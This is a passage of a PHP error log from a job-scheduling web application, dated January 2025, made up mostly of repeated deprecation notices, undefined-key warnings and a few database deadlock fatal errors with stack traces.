07:18:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 23:14:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Jan-2025 23:14:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 03:06:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 05:02:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 10:55:10 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [05-Jan-2025 12:47:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 12:48:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 12:50:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 12:51:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 12:51:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:08:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 13:11:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:11:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:14:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:15:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:16:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 13:25:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:26:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:36:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 13:44:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 14:14:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 03:02:36 Australia/Sydney] PHP Warning: Attempt to read property "assignedCleaneremail" on bool in /home/emeraadmin/public_html/pages/taskform.php on line 198 [06-Jan-2025 03:02:36 Australia/Sydney] PHP Warning: Undefined array key "email" in /home/emeraadmin/public_html/pages/taskform.php on line 201 [05-Jan-2025 22:42:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 22:44:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 22:45:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:45:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:46:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:46:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:46:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:46:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:47:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:47:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:47:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 23:33:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 23:39:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 23:47:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 23:50:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 23:56:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 00:12:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 00:53:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 00:53:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 00:53:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 00:54:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 00:57:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 01:27:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 01:44:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 01:45:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 01:48:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:19:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 02:21:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:21:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:22:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:22:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [06-Jan-2025 02:42:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 02:53:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 02:56:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 03:30:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 03:47:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 03:53:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 04:00:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 04:50:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [06-Jan-2025 04:56:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 05:25:39 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [06-Jan-2025 05:25:59 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [06-Jan-2025 05:26:03 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [06-Jan-2025 05:27:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 05:39:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 05:43:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 06:14:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 06:29:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:30:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:32:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:33:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:35:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:37:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:47:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:47:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:47:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:48:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:48:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:51:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:52:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:52:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:52:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:54:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:58:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 07:19:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 07:21:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 11:36:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 11:43:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 11:43:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 11:43:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 20:46:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 22:24:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:03:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:04:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:17:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:26:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:27:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 23:30:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 00:20:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 00:21:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 00:21:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 01:02:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 02:11:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 02:11:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 02:12:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 02:16:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:33:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:36:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:39:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:43:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:49:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 04:10:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 04:10:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:11:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:34:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 04:48:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 04:49:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:52:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:54:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:54:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:55:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 05:02:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 05:02:43 UTC] 